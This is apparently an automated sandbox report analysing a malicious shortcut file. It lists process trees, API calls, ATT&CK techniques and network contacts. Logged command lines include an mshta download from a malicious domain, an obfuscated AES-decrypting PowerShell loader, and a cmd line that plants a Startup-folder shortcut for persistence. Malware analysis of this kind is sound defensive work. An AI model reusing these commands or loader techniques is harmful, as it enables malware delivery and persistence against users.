Source: C:\Users\Public\Guard.exeCode function: 30_2_003BCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,30_2_003BCD9F
Source: C:\Users\Public\Guard.exeCode function: 30_2_003BF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,30_2_003BF5D8
Source: C:\Users\Public\Guard.exeCode function: 30_2_003BF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,30_2_003BF735
Source: C:\Users\Public\Guard.exeCode function: 30_2_003BFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,30_2_003BFA36
Source: C:\Users\Public\Guard.exeCode function: 30_2_003B3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,30_2_003B3CE2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B44005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,35_2_00B44005
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B4494A GetFileAttributesW,FindFirstFileW,FindClose,35_2_00B4494A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B4C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,35_2_00B4C2FF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B4CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,35_2_00B4CD9F
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B4CD14 FindFirstFileW,FindClose,35_2_00B4CD14
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B4F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,35_2_00B4F5D8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B4F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,35_2_00B4F735
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B4FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,35_2_00B4FA36
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B43CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,35_2_00B43CE2
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CD1D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,19_2_00007FF656CD1D80
Source: mshta.exe, 00000004.00000003.2409415921.0000022336CE5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2416807738.0000022336CE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2403041983.0000022336CE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2403505478.0000022336C4C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2416251856.0000022336C4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3392912200.0000016D6AE55000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3389923475.0000016D6582B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: powershell.exe, 0000001C.00000002.2573231231.00000281CBA8A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: wscript.exe, 00000022.00000002.2605290084.0000017021492000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}p
Source: powershell.exe, 00000008.00000002.2394122505.000001BE28102000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000001E.00000002.3392746726.0000000004611000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif, 00000023.00000002.3398798331.0000000003F65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 0000001C.00000002.2573231231.00000281CBA49000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllvv
Source: C:\Users\Public\Guard.exeAPI call chain: ExitProcess graph end nodegraph_30-97676
Source: C:\Users\Public\Guard.exeAPI call chain: ExitProcess graph end nodegraph_30-97748
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D40A00 BlockInput,19_2_00007FF656D40A00
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CB37B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,19_2_00007FF656CB37B0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CD5BC0 GetLastError,IsDebuggerPresent,OutputDebugStringW,19_2_00007FF656CD5BC0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D47634 LoadLibraryA,GetProcAddress,19_2_00007FF656D47634
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D1D780 GetProcessHeap,HeapAlloc,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,CreateThread,19_2_00007FF656D1D780
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CD57E4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_00007FF656CD57E4
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CD59C8 SetUnhandledExceptionFilter,19_2_00007FF656CD59C8
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CF8FE4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_00007FF656CF8FE4
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CEAF58 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_00007FF656CEAF58
Source: C:\Users\Public\Guard.exeCode function: 30_2_0037A354 SetUnhandledExceptionFilter,30_2_0037A354
Source: C:\Users\Public\Guard.exeCode function: 30_2_0037A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_0037A385
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B0A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,35_2_00B0A385
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B0A354 SetUnhandledExceptionFilter,35_2_00B0A354

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeSection loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe protection: readonly
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D1CE68 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,19_2_00007FF656D1CE68
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CB37B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,19_2_00007FF656CB37B0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D29420 SendInput,keybd_event,19_2_00007FF656D29420
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D2D1A4 mouse_event,19_2_00007FF656D2D1A4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/FILEANH
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($pzaMyJg){return -split ($pzaMyJg -replace '..', '0x$& ')};$KUtXL = clean('[hex-encoded payload omitted]');$IiqxjTB = [System.Security.Cryptography.Aes]::Create();$IiqxjTB.Key = clean('747464414A50546B43514F4F4B7A5077');$IiqxjTB.IV = New-Object byte[] 16;$UdJKkrroG = $IiqxjTB.CreateDecryptor();$mhREwMEES = [Text.Encoding]::UTF8.GetString
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\user\AppData\Roaming\New_2025.webp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\PefjSkkhb.exe "C:\Users\user\AppData\Roaming\PefjSkkhb.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & echo url="c:\users\user\appdata\local\wordgenius technologies\swiftwrite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & exit
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function clean ($pzamyjg){return -split ($pzamyjg -replace '..', '0x$& ')};$kutxl = clean('[hex-encoded payload omitted]');$iiqxjtb = [system.security.cryptography.aes]::create();$iiqxjtb.key = clean('747464414a50546b43514f4f4b7a5077');$iiqxjtb.iv = new-object byte[] 16;$udjkkrrog = $iiqxjtb.createdecryptor();$mhrewmees = [text.encoding]::utf8.getstring
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & echo url="c:\users\user\appdata\local\wordgenius technologies\swiftwrite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & exit
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D1C858 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,19_2_00007FF656D1C858
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D1D540 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,19_2_00007FF656D1D540
Source: powershell.exe, 00000008.00000002.2347436380.000001BE20956000.00000004.00000800.00020000.00000000.sdmp, PefjSkkhb.exe, 00000013.00000000.2298099515.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp, Guard.exe, 0000001E.00000003.2439143400.00000000051A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: PefjSkkhb.exe, Guard.exe, SwiftWrite.pifBinary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CEFD20 cpuid 19_2_00007FF656CEFD20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CEBEF8 GetSystemTimeAsFileTime,19_2_00007FF656CEBEF8
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D12BCF GetUserNameW,19_2_00007FF656D12BCF
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CF2650 _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,19_2_00007FF656CF2650
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CD1D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,19_2_00007FF656CD1D80
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: powershell.exe, 0000001C.00000002.2428787870.00000281B3C25000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Users\Public\Guard.exe
Source: powershell.exe, 0000001C.00000002.2567349920.00000281CB86A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rs\Public\Guard.exe
Source: Guard.exe, 0000001E.00000002.3388172277.0000000001888000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Device\HarddiskVolume3\Users\Public\Guard.exe
Source: powershell.exe, 0000001C.00000002.2428787870.00000281B3C25000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Public\Guard.exe
Source: powershell.exe, 0000001C.00000002.2567349920.00000281CB8B9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2573231231.00000281CBA8A000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000001E.00000003.2429762614.0000000001810000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 0000001E.00000003.2434948804.0000000001810000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 0000001E.00000003.2419847604.0000000001810000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 0000001E.00000003.2435132348.0000000001810000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 0000001E.00000003.2436049500.0000000001810000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 0000001E.00000003.2439921440.0000000004FE1000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000001E.00000003.2420041758.0000000001810000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 0000001E.00000003.2424826208.0000000001810000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 0000001E.00000003.2435690238.0000000001810000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Guard.exe
Source: Guard.exe, 0000001E.00000002.3389847396.0000000003E26000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pC:\Users\Public\Guard.exe
Source: PefjSkkhb.exe, 00000013.00000002.2359609213.00000278E57B8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2573231231.00000281CBA8A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2428787870.00000281B3C25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2573231231.00000281CBA49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2428787870.00000281B3707000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, Guard.exe, 0000001E.00000002.3387798487.00000000015BF000.00000004.00000010.00020000.00000000.sdmp, Guard.exe, 0000001E.00000002.3387798487.00000000015CF000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: C:\Users\Public\Guard.exe
Source: powershell.exe, 0000001C.00000002.2428787870.00000281B3C25000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \Users\Public\Guard.exe
Source: Guard.exe, 0000001E.00000002.3389847396.0000000003E26000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?pC:\Users\Public\Guard.exe
Source: SwiftWrite.pifBinary or memory string: WIN_81
Source: SwiftWrite.pifBinary or memory string: WIN_XP
Source: SwiftWrite.pifBinary or memory string: WIN_XPe
Source: SwiftWrite.pifBinary or memory string: WIN_VISTA
Source: PefjSkkhb.exe.8.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: SwiftWrite.pifBinary or memory string: WIN_7
Source: SwiftWrite.pifBinary or memory string: WIN_8
Source: Guard.exe.20.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D44074 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,19_2_00007FF656D44074
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D43940 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,19_2_00007FF656D43940
Source: C:\Users\Public\Guard.exeCode function: 30_2_003C696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,30_2_003C696E
Source: C:\Users\Public\Guard.exeCode function: 30_2_003C6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,30_2_003C6E32
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B5696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,35_2_00B5696E
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B56E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,35_2_00B56E32
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | 1 Scripting | 2 Valid Accounts | 2 Native API | 1 Scripting | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 21 Input Capture | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 12 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
| Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Email Collection | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | 3 PowerShell | 2 Valid Accounts | 2 Valid Accounts | 2 Obfuscated Files or Information | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 21 Input Capture | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | 2 Registry Run Keys / Startup Folder | 21 Access Token Manipulation | 1 DLL Side-Loading | NTDS | 37 System Information Discovery | Distributed Component Object Model | 3 Clipboard Data | 24 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 112 Process Injection | 231 Masquerading | LSA Secrets | 151 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 2 Registry Run Keys / Startup Folder | 2 Valid Accounts | Cached Domain Credentials | 31 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 31 Virtualization/Sandbox Evasion | DCSync | 13 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 112 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
[Behavior graph not reproduced. Behavior Graph ID: 1577882, Sample: R4qP4YM0QX.lnk, Startdate: 18/12/2024, Architecture: WINDOWS, Score: 100]

Source | Detection | Scanner | Label | Link
R4qP4YM0QX.lnk | 18% | ReversingLabs | Win32.Trojan.ForExec |
Source | Detection | Scanner | Label | Link
C:\Users\Public\Guard.exe | 8% | ReversingLabs | |
C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | 8% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PefjSkkhb.exe | 32% | ReversingLabs | Win32.Exploit.Generic |
No Antivirus matches
No Antivirus matches
                                                                                                                                                            https://mail.google.com/mail/mu/mp/266/#tl/Inboxee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://tiffany-careers.com/FILEANHhttps://tiffany-careers.com/FILEANHPmshta.exe, 00000004.00000003.2408387399.0000022B3F065000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://music.amazon.comee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 00000007.00000003.2190194676.0000016D6AC30000.00000004.00000800.00020000.00000000.sdmp, edb.log.7.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedgeee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://open.spotify.comee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://twitter.com/ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://tiffany-careers.com/FILEANHsmshta.exe, 00000004.00000003.2403505478.0000022336C4C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2416251856.0000022336C4D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.116.245.121 | unknown | United States | 20940 | AKAMAI-ASN1EU | false
147.45.49.155 | tiffany-careers.com | Russian Federation | 2895 | FREE-NET-ASFREEnetEU | true
162.159.61.3 | unknown | United States | 13335 | CLOUDFLARENETUS | false
139.99.188.124 | unknown | Canada | 16276 | OVHFR | true
23.44.203.84 | unknown | United States | 20940 | AKAMAI-ASN1EU | false
239.255.255.250 | unknown | Reserved | unknown | unknown | false
142.250.181.65 | googlehosted.l.googleusercontent.com | United States | 15169 | GOOGLEUS | false
172.64.41.3 | chrome.cloudflare-dns.com | United States | 13335 | CLOUDFLARENETUS | false
                                                                                                                                                                        IP
                                                                                                                                                                        192.168.2.6
                                                                                                                                                                        127.0.0.1
                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                        Analysis ID:1577882
                                                                                                                                                                        Start date and time:2024-12-18 21:05:04 +01:00
                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                        Overall analysis duration:0h 9m 42s
                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                        Report type:full
                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                        Number of analysed new started processes analysed:38
                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                        Technologies:
                                                                                                                                                                        • HCA enabled
                                                                                                                                                                        • EGA enabled
                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                        Sample name:R4qP4YM0QX.lnk
                                                                                                                                                                        renamed because original name is a hash value
